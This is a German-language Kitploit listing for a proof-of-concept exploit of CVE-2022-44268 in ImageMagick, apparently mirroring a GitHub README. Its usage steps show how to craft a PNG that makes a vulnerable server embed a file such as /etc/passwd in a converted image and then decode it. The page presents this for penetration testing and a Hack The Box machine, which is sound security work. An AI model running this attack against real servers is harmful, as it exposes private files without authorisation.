Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ImageMagick-lfi-poc — Proof-of-Concept-Exploit für CVE-2022-44268, der beliebiges Dateilesen über manipulierte PNG-Bilder ermöglicht, die von ImageMagick verarbeitet werden. Enthält Generierungs- und Dekodierungsskripte für Penetrationstests und CTF-Herausforderungen. | Kitploit
Tools/GitHubGitHub/fanbyprinciple/imagemagick-lfi-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungCTFPenetrationstests
GitHubfanbyprinciple/imagemagick-lfi-poc

ImageMagick-lfi-poc

Proof-of-Concept-Exploit für CVE-2022-44268, der beliebiges Dateilesen über manipulierte PNG-Bilder ermöglicht, die von ImageMagick verarbeitet werden. Enthält Generierungs- und Dekodierungsskripte für Penetrationstests und CTF-Herausforderungen.

Repository anzeigen
112vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ImageMagick-lfi-poc

ImageMagick – Beliebige Dateien lesen – CVE-2022-44268

auch in htb pilgrimage verwendet

ImageMagick LFI PoC [CVE-2022-44268]

Die Forscher von MetabaseQ entdeckten CVE-2022-44268, d.h. ImageMagick 7.1.0-49 ist anfällig für Informationspreisgabe. Wenn es ein PNG-Bild parst (z.B. zum Ändern der Größe), kann das resultierende Bild den Inhalt einer beliebigen entfernten Datei eingebettet haben (falls das ImageMagick-Binary die Berechtigung hat, sie zu lesen).

Schritt 1 :

Führe aus

root@kitploit:~
pip install pillow
sudo apt install graphicsmagick-imagemagick-compat

Schritt 2 ;

Führe aus

root@kitploit:~
python3 magick_exploit.py generate -l [local_file] -o [output_file]

Hier in diesem Fall ist die lokale Datei '/etc/passwd', die ich von der Opfermaschine erhalten möchte.

Schritt 3 :

Lade die Bilddatei auf die Website hoch.

Schritt 4 :

Hole die konvertierte Bilddatei von der Website. Benenne sie als 'downloaded_image.png'

Schritt 5:

Führe aus

root@kitploit:~
python3 decode_profile.py

Hinweis

Falls ein Fehler wie

root@kitploit:~
 "/home/kali/codeplay/oscp/htb/machines/pilgrimage/decode_profile.py", line 8, in <module>
    profile = output_str.split("Raw profile type: \n\n    ")[1].split('Date:create:')[0]
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^
IndexError: list index out of range

auftritt, bedeutet das, dass die von dir genannte Datei nicht existiert. Verwende /etc/passwd für einen Test.

Danksagungen

  1. https://github.com/adhikara13/CVE-2022-44268-MagiLeak
  2. https://github.com/Sybil-Scan/imagemagick-lfi-poc
Tool herunterladen